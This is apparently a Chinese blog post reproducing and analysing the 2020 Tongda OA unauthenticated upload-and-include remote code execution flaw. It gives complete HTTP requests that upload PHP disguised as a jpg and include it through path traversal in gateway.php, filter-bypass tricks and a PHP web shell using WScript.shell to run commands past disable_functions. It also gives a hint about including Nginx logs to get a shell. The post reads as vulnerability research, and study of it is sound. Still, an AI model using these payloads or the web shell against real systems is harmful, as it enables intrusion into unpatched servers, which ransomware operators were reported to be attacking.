zoukankan      html  css  js  c++  java

  • 3.13通达OA文件上传+包含getshell复现分析

    目录

    3.13通达OA文件上传+包含getshell

    简述

    通达OA是北京通达信科科技有限公司出品的 "Office Anywhere 通达网络智能办公系统"。
    3月13日,通达OA在官方论坛发布通告称,近日接到用户反馈遭到勒索病毒攻击,提示用户注意安全风险,并且于同一天对所有版本发布了加固补丁。
    在受影响的版本中,攻击者可以在未认证的情况下向服务器上传jpg图片文件,然后包含该文件,造成远程代码执行。该漏洞无需登录即可触发。

    影响版本

    文件上传漏洞为全版本通杀

    v11
2017
2016
2015
2013 增强版
2013

    文件包含漏洞只有2017和V11.3版本存在

    手工复现

    V11.3

    上传

    /ispirit/im/upload.php

    POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.146.180:85
Content-Length: 658
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
echo 123;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--

    2003/826110489.jpg

    包含

    /ispirit/interface/gateway.php

    POST /ispirit/interface/gateway.php? HTTP/1.1
Host: 192.168.146.180:85
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Origin: http://192.168.146.180:85
Connection: close
Referer: http://192.168.146.180:85/ispirit/interface/gateway.php?
Cookie: 
Upgrade-Insecure-Requests: 1

json={"url":"../../general/../../attach/im/2003/826110489.jpg"}

    如果burp包含不成功建议通过浏览器利用hackbar发post包含试试

    分析

    代码加密方式为zend54,在线解密http://dezend.qiling.org/free/

    V11.3

    上传

    /ispirit/im/upload.php

    $P = $_POST['P'];
if (isset($P) || $P != '') {
    ob_start();
    include_once 'inc/session.php';
    session_id($P);
    session_start();
    session_write_close();
} else {
    include_once './auth.php';
}

    当POST提交P参数时,包含inc/session.php获取session,否则就会包含/auth.php进行用户认证。

    需要POST提交DEST_UID,不为0和空的数字即可绕过exit

    1<=count($_FILES)判断是否有文件上传,如果上传包中存在文件且$UPLOAD_MODE == '1'则调用upload()上传,

    返回[vm]$ATTACHMENT_ID|$ATTACHMENT_NAME|$DURATION[/vm]
    在utility_file.php中的1839行检查filename中的php

    直接上传php会被拦但加个点.空格.即可绕过,win环境可用

    utility_file.php的1352和1451行会检查:,所以利用:绕过不可行

    后根据大佬的文章和自己的测试总结
    UPLOAD_MODE取1,2,3均可
    P参数提交
    DEST_UID不为0和空的数字
    即可无认证上传

    包含

    /ispirit/interface/gateway.php

    直接包含inc/session.php获取session,即无需认证

    不传递P参数即可绕过此处if判断

    if ($json) {
    $json = stripcslashes($json);
    $json = (array) json_decode($json);
    foreach ($json as $key => $val) {
        if ($key == 'data') {
            $val = (array) $val;
            foreach ($val as $keys => $value) {
                ${$keys} = $value;
            }
        }
        if ($key == 'url') {
            $url = $val;
        }
    }
    if ($url != '') {
        if (substr($url, 0, 1) == '/') {
            $url = substr($url, 1);
        }
        if (strpos($url, 'general/') !== false || strpos($url, 'ispirit/') !== false || strpos($url, 'module/') !== false) {
            include_once $url;
        }
    }
    exit;
}

    传递json数据,且url参数的值中含

    general/
ispirit/
module/

    三个字符串中的一个即可包含url

    补充

    变量覆盖

    OA之前报过变量覆盖的洞,所以直接传入的参数就会覆盖掉变量里的值,这也是UPLOAD_MODE、P、DEST_UID可以直接传入的原因。

    绕disable_function

    php.ini有disable_function,可使用com组件绕过

    <?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

    直接包含错误日志getshell

    利用包含漏洞包含Nginx的错误日志getshell

    参考

    https://github.com/jas502n/OA-tongda-RCE
https://mp.weixin.qq.com/s?__biz=MzU2NTY1NTQxNw==&mid=2247485643&idx=1&sn=fbf88da313852b50be15b08a7a5d602f&chksm=fcb92addcbcea3cbf71f4151cb19df4509dc6dea1ef86bed8ceef3b99210745994b815646d69&mpshare=1&scene=23&srcid=&sharer_sharetime=1585054739883&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzU0ODg2MDA0NQ==&mid=2247483721&idx=1&sn=46545810034290c69fd273443398cf8c&chksm=fbb9f8abccce71bdd038dd93a5701f7d275a242e304e66636c53670ca6bcdb2126b099e2971f&mpshare=1&scene=23&srcid=&sharer_sharetime=1584599692956&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650460286&idx=2&sn=33bab282bdc585b969d78d1e5aeef946&chksm=83bbb59ab4cc3c8c7ad16de72e24f65192e84e7217a1860b6b7d9dc7e6c2ac3cfc827c35e112&mpshare=1&scene=23&srcid=&sharer_sharetime=1584764219575&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzI0NzEwOTM0MA==&mid=2652474779&idx=1&sn=39abda9c01a8cfda4c7075be21ce032d&chksm=f2582e28c52fa73ef3f40a635849d12df2268ff181f0e28f6f9dd94da9f9692645ee6b2d14af&mpshare=1&scene=23&srcid=&sharer_sharetime=1584764427295&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzU1NDkwMzAyMg==&mid=2247484095&idx=1&sn=ba1519a0a98b662962d7e5e29e365f6d&chksm=fbdd363eccaabf28d4301e785f5827e459f8985b5e35d090795333d6a9703a38dae23b060183&mpshare=1&scene=23&srcid=&sharer_sharetime=1584765842974&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd[TOC]
https://github.com/jas502n/OA-tongda-RCE
https://mp.weixin.qq.com/s?__biz=MzI0NzEwOTM0MA==&mid=2652474779&idx=1&sn=39abda9c01a8cfda4c7075be21ce032d&chksm=f2582e28c52fa73ef3f40a635849d12df2268ff181f0e28f6f9dd94da9f9692645ee6b2d14af&mpshare=1&scene=23&srcid=&sharer_sharetime=1584764427295&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650460286&idx=2&sn=33bab282bdc585b969d78d1e5aeef946&chksm=83bbb59ab4cc3c8c7ad16de72e24f65192e84e7217a1860b6b7d9dc7e6c2ac3cfc827c35e112&mpshare=1&scene=23&srcid=&sharer_sharetime=1584764219575&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzU0ODg2MDA0NQ==&mid=2247483721&idx=1&sn=46545810034290c69fd273443398cf8c&chksm=fbb9f8abccce71bdd038dd93a5701f7d275a242e304e66636c53670ca6bcdb2126b099e2971f&mpshare=1&scene=23&srcid=&sharer_sharetime=1584599692956&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzU1NDkwMzAyMg==&mid=2247484094&idx=1&sn=bea74b8c5d2d1a3880f24d2cb6c5a7a1&chksm=fbdd363fccaabf2932e47201b1ddf7ed85291fbe85643fa9755aa9381942605cd77683a38f9b&mpshare=1&scene=23&srcid=&sharer_sharetime=1584681671858&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzU1NDkwMzAyMg==&mid=2247484095&idx=1&sn=ba1519a0a98b662962d7e5e29e365f6d&chksm=fbdd363eccaabf28d4301e785f5827e459f8985b5e35d090795333d6a9703a38dae23b060183&mpshare=1&scene=23&srcid=&sharer_sharetime=1584765842974&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzU2NTY1NTQxNw==&mid=2247485643&idx=1&sn=fbf88da313852b50be15b08a7a5d602f&chksm=fcb92addcbcea3cbf71f4151cb19df4509dc6dea1ef86bed8ceef3b99210745994b815646d69&mpshare=1&scene=23&srcid=&sharer_sharetime=1585054739883&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
  • 相关阅读:
    关于dependency的scope
    Enum
    vim
    postgres函数
    Static块与线程安全
    查看文件夹及文件大小df du
    mac下安装jdk
    硬盘修复原理
    关于Jquery的Accordion在IE下闪烁,不稳定的问题
    vmare安装linux问题总结4(redhat在启动时卡在sendmail很久)
  • 原文地址:https://www.cnblogs.com/Rain99-/p/12531375.html
Copyright © 2011-2022 走看看